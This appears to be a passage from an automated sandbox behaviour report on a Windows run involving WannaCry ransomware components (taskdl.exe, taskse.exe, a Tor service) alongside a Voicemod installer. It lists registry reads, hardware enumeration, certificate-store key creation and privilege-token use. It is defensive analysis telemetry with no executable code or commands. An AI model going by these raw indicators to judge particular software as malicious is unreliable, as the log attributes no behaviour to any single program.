Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskdl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Temp\{A60A61C6-DF86-4316-AE12-9063B8D5B120}\.cr\vc_redist.x86.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\WannaCry.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x86.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskdl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\taskse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\@[email protected] N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\WannaCry.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 C:\Windows\system32\DrvInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Filters C:\Windows\system32\DrvInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID C:\Windows\system32\DrvInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\DrvInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs C:\Windows\system32\DrvInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Filters C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service C:\Windows\system32\DrvInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Filters C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Phantom C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\LowerFilters C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\UpperFilters C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\LowerFilters C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\UpperFilters C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Phantom C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Windows\system32\DrvInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\system32\DrvInst.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\DrvInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 454771.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 528376.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 569269.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 554491.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A
N/A N/A C:\Users\Admin\Downloads\TaskData\Tor\taskhsvc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files\Voicemod Desktop\driver\devcon.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
Token: 33 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
